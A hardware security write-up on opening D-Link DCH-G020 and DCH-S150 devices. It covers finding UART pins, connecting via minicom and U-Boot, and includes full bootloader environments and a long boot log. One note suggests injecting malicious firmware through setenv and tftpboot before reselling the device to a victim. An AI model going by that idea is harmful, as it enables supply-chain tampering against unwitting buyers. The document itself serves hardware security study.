Disassembly typically requires a few tools and strong nerves. A smaller Phillips screwdriver (PH0/PH3) and some plastic opening tools are generally sufficient. Furthermore, some additional tools were used. These are a USB-to-TTL converter (CH340G) shipped from china for the cost of one buck and a common multimeter to determine the pin assignment. Alternative instruments are introduced as needed. The functions of the CH340G can also be performed by a development board like the Raspberry Pi.

ⓘ D-Link® DCH-G020: Gateway Connected Home Hub
ⓘ D-Link® DCH-S150: Home Wi-Fi Motion Sensor

On-Chip Debug

CH340G: USB-to-TTL

Universal Asynchronous Transmitter and Receiver (UART) serial interface is a rather old hardware component which is still the standard debugging interface of most microcontrollers. Data transmission takes place directly via the Transmit (TX) and Receive (RX) lines without handshake so that no additional lines are required. This type of serial communication is referred to as TTL-UART and is only suitable for data transmission over short distances. However, a common GND connection is indispensable for error-free data transmission. The RS-232 standard, on the other hand, uses six additional control lines. In the following, the term UART will refer to a TTL-UART (Transistor-Transistor Logic). Furthermore, no distinction is made between UART and the more specific USART (Universal Synchronous Asynchronous Receiver Transmitter) component.

Identification of potential UART interfaces can be done after the devices have been dissembled so that the PCB is freely accessible. The basic rule for identifying UART interfaces is to search for 3 or 4 contiguous pins, holes, or pads on the exposed board. These may be placed and labeled in obvious locations, or they may be hidden between other test points. Alternatively, the conductor tracks on the PCB can be evaluated. This method is especially useful when searching for hidden interfaces.

Confirmation is still required after identifying a potential UART interface. A logic analyzer or oscilloscope are of great advantage here, since they can determine the pin assignment very conveniently. In the case of the UART, this is not necessary, since the pin assignment can also be determined with a multimeter and some trial-and-error. GND is determined by a continuity test and VCC by its constant voltage. UART usually transmits with 3.3V, but in some cases, it can also be 1.8V or 5V. In the best case, TX is transmitting when determining the pin assignment, and a varying voltage between 0V and VCC can be observed since TX is the active component of the UART. If TX is not transmitting, there will be no voltage on RX and TX. Then it is necessary to check which of the two pins reacts to the input of the terminal and which one provides the output on display. The VCC connector does not need to be present or used in such a setup. It is best avoided, as incorrect wiring can cause damage to the host or slave if the electronics do not have suitable protection mechanisms. In rare cases, the GND pin will also be omitted. UART does not have to provide a designated GND pin but can be connected to the ground plane of the PCB at any point. The JTAGulator may also be used for convenient UART detection, by following the guide "JTAGulator: Find IoT-Device's UART interface" or by following these quick steps using a common multimeter DVOM:

  • GrouND (GND): Use the continuity test (beeper) on your DVOM. Place one of the test leads on the pin in question and touch with the other lead any connection to ground on the PCB board. These are most visible golden contacts with no electronic soldered to it or for example the metal cover on a WIFI chip.
  • Voltage (VCC): Note that this pin can cause damage if misconnected! Set the DVOM to Direct Current (DC) with the Voltage (V) limit just above 5V. Place one of the test leads on the pin in question and touch with the other lead any connection to ground (could be a plug socket). A constant Voltage of 1,8V, 3,3V or 5V must be detected on one pin.
  • Transmit (TX): The active, sending component of the interface. While using the same configuration on the DVOM as for the VCC pin, this pin should have varying voltage since it is (usually) transmitting data by default.
  • Receive (RX): The passive, receiving component of the interface. While using the same configuration on the DVOM as for the VCC pin, this pin should have constant voltage of 0V since it is only listening for incoming data. But it shouldn't pass the continuity test as for detecting GND.

A Connection via serial console can be established as soon as a corresponding UART interface is identified and confirmed. Examples of serial console programs are Serial (macOS), minicom (UNIX) and Putty (Windoofs), and a USB-to-TTL converter is most likely required with modern computers. Its use requires additional configuration of the console of the terminal device from which the connection is to be established. This includes the specification of Baudrate in bits per second, Data Bits (7 or 8), Parity (none, even or odd) and Stop Bits (1 or 2). The configuration of the baud rate, which specifies the transmission rate in bits per second, should be sufficient in most cases. An oscilloscope or a logic analyzer can be used again to determine the baud rate. Alternatively, the usual baud rates, such as 9600, 19200, 38400, 57600, and 115200 b/s, can be tried out until something readable appears in the terminal. A wrong configuration will result in data not being recognized correctly, both when sending and receiving data, and thus pure gibberish will be displayed. Additional configurations should not be necessary, as it rarely deviates from the standard configuration of (8N1), which stands for 8 data bits, parity none, and one stop bit. The result of this configuration is an interface to the local terminal of the target devices, which can be used in further steps to analyze or extract the firmware.

ⓘ PCB: UART Pinout
Note: When using a Raspberry Pi, the GPIOs 14 and 15 respectively, which are pins 8 and 10 on the GPIO header, need to be reconfigured in order to use UART instead of BT. Here the official raspberry pi documentation can be referred to.

After setting up a serial client in any form, the command line tool "minicom" can be used on UNIX-based systems to initialize a connection. Refer to the following bash script to start the console client (e.g. Raspberry Pi 2b+ (/dev/ttyAMA0)), providing additional functions in order to manage logs per UART session. The script accepts the baudrate as first and the serial interface as second parameter.

ⓘ openConsole.sh $BAUD_RATE $DEVICE
 #!/bin/bash
 BAUD_RATE=$1
 $DEVICE=$2
 SPWD="$( cd "$(dirname "$0")" ; pwd -P )"
 LOG=$SPWD/logs/minicom_$(date -u +"_%Y-%m-%d_%H:%M:%S").log
 
 minicom -b $BAUD_RATE -o -D $DEVICE -C $LOG
 
 echo -e "\033[1mLog: \033[0m"$LOG"\033[1m"
 echo -e -n "Delete (\033[0;31mrm\033[0m) || Save and See (\033[0;31mcat\033[0m) || Move (\033[0;31mmv\033[0m)? "
 read -p '' choice
 case "$choice" in 
   "rm" ) rm $LOG;;
   "cat" ) cat $LOG;;
   "mv" ) read -p "Destination: "$SPWD F && mv $LOG $SPWD$F;;
 esac
 
 ls -Ali $SPWD"/logs" | sed '/^t/d'

Bootloader

The Bootloader is of great interest. The Universal Bootloader (U-Boot) is possibly the most frequently used in the embedded world. U-Boot offers a shell that can be accessed when the system is booting third-stage. To do this, the autoboot process must be interrupted, which usually gives a few seconds to do so by pressing the appropriate key. The available options, such as the boot delay and key-to-press, are displayed on the console. The bootloader can be password protected, which was not the case with any tested device here. From the bootloader, several useful actions can be performed. Firmware dumps or updates can also be performed from the bootloader, which owns the highest privileges and full access to the hardware without restrictions.

ⓘ D-Link® DCH-G020: Gateway Connected Home Hub
ath> ?
?       - alias for 'help'
boot    - boot default, i.e., run 'bootcmd'
bootd   - boot default, i.e., run 'bootcmd'
bootm   - boot application image from memory
cp      - memory copy
erase   - erase FLASH memory
help    - print online help
httpd   -  simple httpd server
md      - memory display
mm      - memory modify (auto-incrementing)
mtest   - simple RAM test
mw      - memory write (fill)
nm      - memory modify (constant address)
ping    - send ICMP ECHO_REQUEST to network host
printenv- print environment variables
progmac - Set ethernet MAC addresses
progmac2 - Set ethernet MAC addresses
reset   - Perform RESET of the CPU
run     - run commands in an environment variable
setenv  - set environment variables
tftpboot- boot image via network using TFTP protocol
version - print monitor version
ath> version

U-Boot 1.1.4--LSDK-10.1.432 (Mar 17 2015 - 19:24:10)
ath> printenv
bootargs=console=ttyS0,115200 root=31:6 rootfstype=squashfs init=/sbin/init mtdparts=ath-nor0:64k(u-boot),64k(ART),64k(MP),64k(config),64k(bootarg),2048k(uImage),12736k(rootfs1),64k(log),512k(mydlink),512k(data1),128k(data2),64k(data3)
bootcmd=bootm 0x9f050000
bootdelay=2
baudrate=115200
ethaddr=0x00:0xaa:0xbb:0xcc:0xdd:0xee
ipaddr=192.168.0.60
serverip=192.168.0.100
dir=
lu=tftp 0x80060000 ${dir}tuboot.bin&&erase 0x9f000000 +$filesize&&cp.b $fileaddr 0x9f000000 $filesize
lf=tftp 0x80060000 ${dir}ap143${bc}-jffs2&&erase 0x9f010000 +$filesize&&cp.b $fileaddr 0x9f010000 $filesize
lk=tftp 0x80060000 ${dir}vmlinux${bc}.lzma.uImage&&erase 0x9f300000 +$filesize&&cp.b $fileaddr 0x9f300000 $filesize
stdin=serial
stdout=serial
stderr=serial
ethact=eth0

Environment size: 754/65532 bytes
ath> 
ⓘ D-Link® DCH-S150: Home Wi-Fi Motion Sensor
ath> ?
?         - alias for 'help'
boot      - boot default, i.e., run 'bootcmd'
bootd     - boot default, i.e., run 'bootcmd'
bootm     - boot application image from memory
cp	      - memory copy
erase     - erase FLASH memory
help      - print online help
md        - memory display
mm        - memory modify (auto-incrementing)
mtest     - simple RAM test
mw        - memory write (fill)
nm        - memory modify (constant address)
ping      - send ICMP ECHO_REQUEST to network host
printenv  - print environment variables
progmac   - Set ethernet MAC addresses
progmac2  - Set ethernet MAC addresses
reset     - Perform RESET of the CPU
run       - run commands in an environment variable
setenv    - set environment variables
tftpboot  - boot image via network using TFTP protocol
version   - print monitor version

ath> printenv

bootargs=console=ttyS0,115200 root=31:08 rootfstype=squashfs init=/sbin/init mtdparts=ath-nor0:64k(u-boot),64k(A)
bootcmd=bootm 0x9f2b0000; setenv bootargs console=ttyS0,115200 root=31:06 rootfstype=squashfs init=/sbin/init m0
bootdelay=2
baudrate=115200
ethaddr=0x00:0xaa:0xbb:0xcc:0xdd:0xee
ipaddr=192.168.0.60
serverip=192.168.0.100
dir=
lu=tftp 0x80060000 ${dir}tuboot.bin&&erase 0x9f000000 +$filesize&&cp.b $fileaddr 0x9f000000 $filesize
lf=tftp 0x80060000 ${dir}ap143${bc}-jffs2&&erase 0x9f010000 +$filesize&&cp.b $fileaddr 0x9f010000 $filesize
lk=tftp 0x80060000 ${dir}vmlinux${bc}.lzma.uImage&&erase 0ø9f300000 +$filesize&&cp.b $fileaddr 0x9f300000 $filese

stdin=serial
stdout=serial
stderr=serial
ethact=eth0

Environment size: 1106/65532 bytes
Note: From those commands provided by U-Boot, the "setenv" and "tftpboot" could be very interesting to inject a mallicious firmware, f.e. before selling the modified device over the internet to a potential victim.

Bootlog

The Bootlog contains messages which are issued by the bootloader, kernel, OS, or applications via standard output (stdout) or standard error (stderr) streams during the booting phase of the device, which presents the first wave of information to be processed as it already defines entry points and influences subsequent analysis steps. The information contained in the bootlog can be system status; available firmware images; kernel version and command-line; busybox version; processor and board information; memory and storage types used; network interfaces and configuration; protocols or applications running; firmware and hardware version; MTD device partitions and file systems. These are just a few examples, but the developers can implement ridiculous things. From printing configurations and custom developer messages to clear-text credentials, much information can be leaked this way, which makes up a large part of the results of this case study.

ⓘ D-Link® DCH-G020: Gateway Connected Home Hub
Note: First start the device, then connect GND! RX and TX can be connected before. You may need to remove the battery. You may need to set the baudrate to 118000 (8N1)
U-Boot 1.1.4--LSDK-10.1.432 (Mar 17 2015 - 19:24:10)

ap143 - Honey Bee 1.0

DRAM:  64 MB
Top of RAM usable for U-Boot at: 84000000
Reserving 157k for U-Boot at: 83fd8000
Reserving 192k for malloc() at: 83fa8000
Reserving 44 Bytes for Board Info at: 83fa7fd4
Reserving 36 Bytes for Global Data at: 83fa7fb0
Reserving 128k for boot params() at: 83f87fb0
Stack Pointer at: 83f87f98
Now running in RAM - U-Boot at: 83fd8000
============================================ 
Date:Mar 17 2015  Time:19:24:10
Loader Version: v1.01 Build:01
Module Name: DCH-G020X
============================================ 
Flash Manuf Id 0xc2, DeviceId0 0x20, DeviceId1 0x18
flash size 16MB, sector count = 256
Flash: 16 MB
* Scan for Linux kernel images ...
* Linux kernel found at 9F050000
* Scan completed.
Only one Linux kernel image found.

Using default environment

In:    serial
Out:   serial
Err:   serial
Net:   ath_gmac_enet_initialize...
ath_gmac_enet_initialize: reset mask:c02200 
Scorpion ---->S27 PHY*
S27 reg init
: cfg1 0x800c0000 cfg2 0x7114
eth0: c4:12:f5:1a:58:f4
athrs27_phy_setup ATHR_PHY_CONTROL 4 :1000
athrs27_phy_setup ATHR_PHY_SPEC_STAUS 4 :10
eth0 up
Honey Bee ---->  MAC 1 S27 PHY *
S27 reg init
ATHRS27: resetting s27
ATHRS27: s27 reset done
: cfg1 0x800c0000 cfg2 0x7214
eth1: c4:12:f5:1a:58:f4
athrs27_phy_setup ATHR_PHY_CONTROL 0 :1000
athrs27_phy_setup ATHR_PHY_SPEC_STAUS 0 :10
athrs27_phy_setup ATHR_PHY_CONTROL 1 :1000
athrs27_phy_setup ATHR_PHY_SPEC_STAUS 1 :10
athrs27_phy_setup ATHR_PHY_CONTROL 2 :1000
athrs27_phy_setup ATHR_PHY_SPEC_STAUS 2 :10
athrs27_phy_setup ATHR_PHY_CONTROL 3 :1000
athrs27_phy_setup ATHR_PHY_SPEC_STAUS 3 :10
eth1 up
eth0, eth1
Setting 0x181162c0 to 0x1831a100
Hit any key to stop autoboot:  2 ��� 1 ��� 0 
## Booting image at 9æ050000 ...
   Image Name:   Linux Kernel Image
   Created:      2016­06-29   9:47:18 UTC
   Image Type:   MIPS Linux Kernel Image (lzma compressed)
   Data Size:    989864 Bytes = 966.7 kB
   Load Addressº 80002000
   Entry Point:  8023dd00
   Verifying Checksum at 0x9f°50040 ...OK
   Uncompressing Kernel Image ... OK
No initrd
## Transferring control to Linux (at address 8023dd00) ...
## Géving linux memsize in bytes, 67108864

Starting kernel ...

Booting QCA953x
Linux version 2.6.31 (adminuser@adminuser-VirtualBox) (gcc version 4.3.3 (GCC) ) #1 Wed Jun 29 05:43:21 EDT 2016
flash_size passed from bootloader = 16
arg 1: console=ttyS0,115200
arg 2: root=31:6
arg 3: rootfstype=squashfs
arg 4: init=/sbin/init
arg 5: mtdparts=ath-nor0:64k(u-boot),64k(ART),64k(MP),64k(config),64k(bootarg),2048k(uImage),12736k(rootfs1),64k(log),512k(mydlink),512k(data1),128k(data2),64k(data3)
arg 6: mem=64M
CPU revision is: 00019374 (MIPS 24Kc)
ath_sys_frequency: cpu apb ddr apb cpu 550 ddr 400 ahb 200
Determined physical RAM map:
 memory: 02000000 @ 00000000 (usable)
User-defined physical RAM map:
 memory: 04000000 @ 00000000 (usable)
Zone PFN ranges:
  Normal   0x00000000 -> 0x00004000
Movable zone start PFN for each node
early_node_map[1] active PFN ranges
    0: 0x00000000 -> 0x00004000
Built 1 zonelists in Zone order, mobility grouping on.  Total pages: 16256
Kernel command line: console=ttyS0,115200 root=31:6 rootfstype=squashfs init=/sbin/init mtdparts=ath-nor0:64k(u-boot),64k(ART),64k(MP),64k(config),64k(bootarg),2048k(uImage),12736k(rootfs1),64k(log),512k(mydlink),512k(data1),128k(data2),64k(data3) mem=64M 
PID hash table entries: 256 (order: 8, 1024 bytes)
Dentry cache hash table entries: 8192 (order: 3, 32768 bytes)
Inode-cache hash table entries: 4096 (order: 2, 16384 bytes)
Primary instruction cache 64kB, VIPT, 4-way, linesize 32 bytes.
Primary data cache 32kB, 4-way, VIPT, cache aliases, linesize 32 bytes
Writing ErrCtl register=00000000
Readback ErrCtl register=00000000
Memory: 55732k/65536k available (2303k kernel code, 9728k reserved, 478k data, 120k init, 0k highmem)
NR_IRQS:128
plat_time_init: plat time init done
Calibrating delay loop... 365.56 BogoMIPS (lpj=731136)
Mount-cache hash table entries: 512

****************ALLOC***********************
 Packet mem: 802e84a0 (0x600000 bytes)
********************************************

NET: Registered protocol family 16
bio: create slab <bio-0> at 0
usbcore: registered new interface driver usbfs
usbcore: registered new interface driver hub
usbcore: registered new device driver usb
NET: Registered protocol family 2
IP route cache hash table entries: 1024 (order: 0, 4096 bytes)
TCP established hash table entries: 2048 (order: 2, 16384 bytes)
TCP bind hash table entries: 2048 (order: 1, 8192 bytes)
TCP: Hash tables configured (established 2048 bind 2048)
TCP reno registered
NET: Registered protocol family 1
ATH GPIOC major 0
squashfs: version 4.0 (2009/01/31) Phillip Lougher
JFFS2 version 2.2 (NAND) (ZLIB) (RTIME) (c) 2001-2006 Red Hat, Inc.
msgmni has been set to 109
alg: No test for stdrng (krng)
io scheduler noop registered (default)
Serial: 8250/16550 driver, 1 ports, IRQ sharing disabled
serial8250.0: ttyS0 at MMIO 0xb8020000 (irq = 19) is a 16550A
console [ttyS0] enabled
loop: module loaded
12 cmdlinepart partitions found on MTD device ath-nor0
Creating 12 MTD partitions on "ath-nor0":
0x000000000000-0x000000010000 : "u-boot"
0x000000010000-0x000000020000 : "ART"
0x000000020000-0x000000030000 : "MP"
0x000000030000-0x000000040000 : "config"
0x000000040000-0x000000050000 : "bootarg"
0x000000050000-0x000000250000 : "uImage"
0x000000250000-0x000000ec0000 : "rootfs1"
0x000000ec0000-0x000000ed0000 : "log"
0x000000ed0000-0x000000f50000 : "mydlink"
0x000000f50000-0x000000fd0000 : "data1"
0x000000fd0000-0x000000ff0000 : "data2"
0x000000ff0000-0x000001000000 : "data3"
usbmon: debugfs is not available
ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver
Port Status 1c000004 
ath-ehci ath-ehci.0: ATH EHCI
ath-ehci ath-ehci.0: new USB bus registered, assigned bus number 1
ehci_reset Intialize USB CONTROLLER in host mode: 13
ehci_reset Port Status 1c000000 
ath-ehci ath-ehci.0: irq 3, io mem 0x1b000000
ehci_reset Intialize USB CONTROLLER in host mode: 13
ehci_reset Port Status 1c000000 
ath-ehci ath-ehci.0: USB 2.0 started, EHCI 1.00
usb usb1: New USB device found, idVendor=1d6b, idProduct=0002
usb usb1: New USB device strings: Mfr=3, Product=2, SerialNumber=1
usb usb1: Product: ATH EHCI
usb usb1: Manufacturer: Linux 2.6.31 ehci_hcd
usb usb1: SerialNumber: platform
usb usb1: configuration #1 chosen from 1 choice
hub 1-0:1.0: USB hub found
hub 1-0:1.0: 1 port detected
usbcore: registered new interface driver cdc_acm
cdc_acm: v0.26:USB Abstract Control Model driver for USB modems and ISDN adapters
usbcore: registered new interface driver usbserial
USB Serial support registered for generic
usbcore: registered new interface driver usbserial_generic
usbserial: USB Serial Driver core
USB Serial support registered for cp210x
usbcore: registered new interface driver cp210x
cp210x: v0.09:Silicon Labs CP210x RS232 serial adaptor driver
USB Serial support registered for pl2303
usbcore: registered new interface driver pl2303
pl2303: Prolific PL2303 USB to serial adaptor driver
nf_conntrack version 0.5.0 (1024 buckets, 4096 max)
TCP cubic registered
NET: Registered protocol family 10
IPv6 over IPv4 tunneling driver
NET: Registered protocol family 17
Bridge firewalling registered
RPC: Registered udp transport module.
RPC: Registered tcp transport module.
arch/mips/atheros/gpio.c (ath_simple_config_init) MP_GPIO: 15
arch/mips/atheros/gpio.c (ath_simple_config_init) RESET_BTN_GPIO: 17, RESET_BTN_TRIGGER_LEVEL: 0
arch/mips/atheros/gpio.c (ath_simple_config_init) WPS_BTN_GPIO: 3, WPS_BTN_TRIGGER_LEVEL: 0
arch/mips/atheros/gpio.c (ath_simple_config_init) WPS_LED_GPIO: 11, LED_ACTIVE_LEVEL: 0
arch/mips/atheros/gpio.c (ath_simple_config_init) I2C_SDA_GPIO: 0, INT_I2C_LOW: 0
arch/mips/atheros/gpio.c (ath_simple_config_init) I2C_SCL_GPIO: 1, INT_I2C_LOW: 0
arch/mips/atheros/gpio.c (ath_simple_config_init) POWER_LED_GPIO1: 13, LED_ACTIVE_LEVEL: 0
arch/mips/atheros/gpio.c (ath_simple_config_init) POWER_LED_GPIO2: 14
VFS: Mounted root (squashfs filesystem) readonly on device 31:6.
Freeing unused kernel memory: 120k freed
init started: BusyBox v1.21.1--LSDK-10.2-00082-4 (2016-06-29 05:45:06 EDT)
starting pid 177, tty '': '/etc/rc.d/rcS'
QCA953x Watchdog Timer enabled (30 seconds, nowayout)
<pca9554_config_set|42> i2c_value = 70
<pca9554_config_set|47> i2c_value = 03
<pca9554_config_set|52> i2c_value = 00
<pca9554_output_set|100> i2c_value = 70
<pca9554_output_set|105> i2c_value = 01
<pca9554_output_set|110> i2c_value = ff

vm.panic_on_oom = 1
kernel.panic = 2

Please press Enter to activate this console. Wed Jun 29 00:00:00 UTC 2016
128+0 records in
128+0 records out
[control_center.c] dch mtd found: mtd8
[control_center.c] kernel jffs2 support detected.
[control_center.c] mount /dev/mtdblock8 to /dch.
killall: zw_meter_check: no process killed
killall: zw_center: no process killed
<pca9554_output_set|100> i2c_value = 70
<pca9554_output_set|105> i2c_value = 01
<pca9554_output_set|110> i2c_value = 02
<pca9554_output_set|100> i2c_value = 70

128+0 records in
128+0 records out
<pca9554_output_set|105> i2c_val/dev/watchdog device found. Try to launch watchdog daemon.
ue = 01

usb 1-1: new high speed USB device using ath-ehci and address 2
qca955x_GMAC: Length per segment 1536
953x_GMAC: qca953x_gmac_attach
Link Int Enabled 
qca953x_set_gmac_caps  CHECK DMA STATUS 
mac:0 Registering S27....
qca955x_GMAC: RX TASKLET - Pkts per Intr:18
qca955x_GMAC: unit 0 --> c4:12:f5:1a:58:f4 
<pca9554_output_set|110> i2c_value = 00

qca955x_GMAC: Max segments per packet :   1
qca955x_GMAC: Max tx descriptor count :   512
qca955x_GMAC: Max rx descriptor count :   128
qca955x_GMAC: Mac capability flags    :   2581
953x_GMAC: qca953x_gmac_attach
Link Int Enabled 
qca953x_set_gmac_caps  CHECK DMA STATUS 
mac:1 Registering S27....
qca955x_GMAC: RX TASKLET - Pkts per Intr:18
qca955x_GMAC: unit 1 --> c4:12:f5:1a:58:f4 
qca955x_GMAC: Max segments per packet :   1
qca955x_GMAC: Max tx descriptor count :   512
qca955x_GMAC: Max rx descriptor count :   128
qca955x_GMAC: Mac capability flags    :   2D81
usb 1-1: New USB device found, idVendor=05e3, idProduct=0608
usb 1-1: New USB device strings: Mfr=0, Product=1, SerialNumber=0
usb 1-1: Product: USB2.0 Hub
usb 1-1: configuration #1 chosen from 1 choice
hub 1-1:1.0: USB hub found
hub 1-1:1.0: 4 ports detected
usb 1-1.1: new full speed USB device using ath-ehci and address 3
usb 1-1.1: New USB device found, idVendor=0658, idProduct=0200
usb 1-1.1: New USB device strings: Mfr=0, Product=0, SerialNumber=0
usb 1-1.1: configuration #1 chosen from 1 choice
cdc_acm 1-1.1:1.0: This device cannot do calls on its own. It is not a modem.
cdc_acm 1-1.1:1.0: ttyACM0: USB ACM device
asf: module license 'Proprietary' taints kernel.
Disabling lock debugging due to kernel taint
ath_hal: 0.9.17.1 (AR5416, AR9380, REGOPS_FUNC, WRITE_EEPROM, TX_DATA_SWAP, RX_DATA_SWAP, 11D)
athr_gmac_ring_alloc Allocated 8192 at 0x82c94000
athr_gmac_ring_alloc Allocated 2048 at 0x82c96800
HONEYBEE ----> S27 PHY MDIO
ATHRS27: resetting s27
ATHRS27: s27 reset done
Setting Drop CRC Errors, Pause Frames and Length Error frames 
Setting PHY...
ath_rate_atheros: Copyright (c) 2001-2005 Atheros Communications, Inc, All Rights Reserved
ath_dev: Copyright (c) 2001-2007 Atheros Communications, Inc, All Rights Reserved
enet1 port0 up 100Mbps Full duplex
953x_GMAC: Enet Unit:1 PHY:0 is UP eth1  RGMII  1000Mbps  full duplex
953x_GMAC: done cfg2 0x7215 ifctl 0x0 miictrl  
Setting Drop CRC Errors, Pause Frames and Length Error frames 
Control Center(219) : Recive a request(6) from 0
receive LAN_CABLE_UP_EVENT
ath_ahb: 10.2-00082-4 (Atheros/multi-bss)
__ath_attach: Set global_scn[0]
Enterprise mode: 0x03fc0000
Restoring Cal data from Flash
Green-AP : Green-AP : Attached

ath_get_caps[6148] rx chainmask mismatch actual 3 sc_chainmak 0
ath_get_caps[6123] tx chainmask mismatch actual 3 sc_chainmak 0
ADDRCONF(NETDEV_UP): eth1: link is not ready
ADDRCONF(NETDEV_CHANGE): eth1: link becomes ready
SC Callback Registration for wifi0
wifi0: Atheros ???: mem=0xb8100000, irq=2
ath_pci: 10.2-00082-4 (Atheros/multi-bss)
device eth1 entered promiscuous mode
br0: port 1(eth1) entering learning state
route: resolving dev
Control Center(219) : Recive a request(408) from 287
Application Center(247) : Recive a request(408) from 219
Control Center(219) : Recive a request(414) from 287
br0: port 1(eth1) entering forwarding state
Control Center(219) : Recive a response(408) from 247
Application Center(247) : Recive a request(414) from 219
udhcpc (v1.21.1--LSDK-10.2-00082-4) started
br0       Link encap:Ethernet  HWaddr C4:12:F5:1A:58:F4  
          inet addr:192.168.0.60  Bcast:192.168.0.255  Mask:255.255.255.0
          inet6 addr: fe80::fc31:aaff:fe11:a844/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:5 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 B)  TX bytes:398 (398.0 B)

Sending discover...
Failed to kill daemon: No such file or directory
VAP device ath0 created 
ath0
Control Center(219) : Recive a response(414) from 247
Sending select for 192.168.0.251...
Lease of 192.168.0.251 obtained, lease time 3600
deleting routers
route: ioctl 0x890c failed: No such process
adding dns 192.168.0.1
Control Center(219) : Recive a request(9) from 383
<led_center:977>: CMD MATCHED cmd = 9
Application Center(247) : Recive a request(418) from 219
killall: llmnr: no process killed
killall: dlink_time_sync: no process killed
42548 00011.587  194675.0    130.9  88128473355622.3  55343.6         0
killall: send_device_info: no process killed
Control Center(219) : Recive a request(427) from 450
killall: crond: no process killed
Control Center(219) : Recive a request(8) from 383
<led_center:977>: CMD MATCHED cmd = 8
DCHC Center(291) : Recive a request(3021) from 219
Control Center(219) : Recive a response(3021) from 291
Control Center(219) : Recive a response(418) from 247
Application Center(247) : Recive a request(416) from 219
killall: mdns-scan: no process killed
Control Center(219) : Recive a response(416) from 247
Application Center(247) : Recive a request(422) from 219
killall: chkfwd: no process killed
Control Center(219) : Recive a response(422) from 247
Application Center(247) : Recive a request(427) from 219
Control Center(219) : Recive a response(427) from 247
Application Center(247) : Recive a request(426) from 219
[  System Message  ]:Load AesEncrypt By Payload 
killall: dch_scheduler: no process killed
Control Center(219) : Recive a response(426) from 247
Control Center(219) : Recive a request(426) from 450
Application Center(247) : Recive a request(426) from 219
Control Center(219) : Recive a response(426) from 247
[  System Message  ]:Check duplicate launcher = [  ]
[  System Message  ]:Retry to Get Miiicasa Version...
 
 DES SSID SET=DCH-G020-58F4 
 ieee80211_ioctl_siwmode: imr.ifm_active=131712, new mode=3, valid=1 
Interface doesn't accept private ioctl...
ForBiasAuto (8BE0): Operation not permitted
Set freq vap stop send + 83944000
Set freq vap stop send -83944000
rm: can't remove '/tmp/catver': No such file or directory
EXECUTE: wget -O /tmp/catver http://api.dch.dlink.com/agent/upgrade?p=ZgSet wait done --83944000
iDIrwvluRC0zpQr1K%2B84h7GSf96lTMNfBCwQcGtmt4TvYNU9kkzyW9GCaUafmaDRkYw7YQzDERLNOMaAqWhURPdhlpvQt4smuy3%2FucT4ilPrzhgO26zUagIoarwYhl&iv=ei4ns9CIBPN4oVHJ18PHqw%3D%3D in 300 seconds.
--2019-04-15 02:08:06--  http://api.dch.dlink.com/agent/upgrade?p=ZgiDIrwvluRC0zpQr1K%2B84h7GSf96lTMNfBCwQcGtmt4TvYNU9kkzyW9GCaUafmaDRkYw7YQzDERLNOMaAqWhURPdhlpvQt4smuy3%2FucT4ilPrzhgO26zUagIoarwYhl&iv=ei4ns9CIBPN4oVHJ18PHqw%3D%3D
Resolving api.dch.dlink.com... 18.196.6.196, 52.29.105.102
Connecting to api.dch.dlink.com|18.196.6.196|:80... connected.
HTTP request sent, awaiting response... --2019-04-15 02:08:07--  http://127.0.0.1:5459/ws/api/getVersion
Connecting to 127.0.0.1:5459... failed: Connection refused.
200 OK
Length: 310 [text/html]
Saving to: `/tmp/catver'

 0% [                                       ] 0           --.-K/s              100%[======================================>] 310         --.-K/s   in 0s      

2019-04-15 02:08:07 (2.81 MB/s) - `/tmp/catver' saved [310/310]

device ath0 entered promiscuous mode
br0: port 2(ath0) entering learning state
Configuration fi ieee80211_ioctl_siwmode: imr.ifm_active=393856, new mode=3, valid=1 
le: /var/etc/oob_ieee80211_scan_unregister_event_handler: Failed to unregister evhandler=82e4bfc4 arg=83ff0000
.ap_bss
 Scan in progress.. Cancelling it 
br0: port 2(ath0) entering disabled state
 DEVICE IS DOWN ifname=ath0
ath0: Could not  DEVICE IS DOWN ifname=ath0
connect to kernel driver
Using interface ath0 with hwaddr c4:12:f5:1a:58:f4 and ssid 'DCH-G020-58F4'
[zw_center]:ZWave inital success!
Control Center(219) : Recive a request(513) from 344
<led_center:977>: CMD MATCHED cmd = 513
service_event : forward a zwave event to the zwave center(344)!
Remain 299 to kill 565 and restart
{"status":"ok","ver":"1.7.5","url":"http://s3-us-west-2.amazonaws.com/static-us-west.dch.dlink.com/firmware/agent/DCH-G020/D-Link-DCH-G020-1.7.5-AX","md5":"5e0ba8747132524622864a5262a1d50e"} -n
br0: port 2(ath0) entering learning state
V_SerVerStr:1.7.5 V_OriginVer:
[  System Message  ]:Current Miiicasa Version: 1.7.5
[  System Message  ]:Current Miiicasa Frimware Addr: http://s3-us-west-2.amazonaws.com/static-us-west.dch.dlink.com/firmware/agent/DCH-G020/D-Link-DCH-G020-1.7.5-AX
[  System Message  ]:Default Linkd.out Path: /dch/linkd
	grep "version_in_text=$V_OriginVer" $V_LauncherPath
V_LinkdPermanentPath is /dch/linkd.out
md5 check:/dch/linkd.out
V_MD5Miii:        5e0ba8747132524622864a5262a1d50e
V_MD5Local:       5e0ba8747132524622864a5262a1d50e
V_BrandStr:        D-Link
V_ModelStr:        DCH-G020
V_Connectable:     1
V_SerVerStr:       1.7.5
V_SerVerAddr:      http://s3-us-west-2.amazonaws.com/static-us-west.dch.dlink.com/firmware/agent/DCH-G020/D-Link-DCH-G020-1.7.5-AX
V_WgetVerAddr:     http://api.dch.dlink.com/agent/upgrade?brand=D-Link&model=DCH-G020&hardware_version=A1&ver=&md5=57afa002b23b759e4070403c74f1b5cc
V_AesEnAddr:       http://api.dch.dlink.com/agent/upgrade?p=ZgiDIrwvluRC0zpQr1K%2B84h7GSf96lTMNfBCwQcGtmt4TvYNU9kkzyW9GCaUafmaDRkYw7YQzDERLNOMaAqWhURPdhlpvQt4smuy3%2FucT4ilPrzhgO26zUagIoarwYhl&iv=ei4ns9CIBPN4oVHJ18PHqw%3D%3D
V_VerStr:          0.9
V_MiiiHasVersion:  1
--2019-04-15 02:08:09--  http://127.0.0.1:5459/ws/api/getVersion
Connecting to 127.0.0.1:5459... failed: Connection refused.
br0: port 2(ath0) entering forwarding state
mlme_create_infra_bss : Overriding HT40 channel with HT20 channel
--2019-04-15 02:08:11--  http://127.0.0.1:5459/ws/api/getVersion
Connecting to 127.0.0.1:5459... failed: Connection refused.
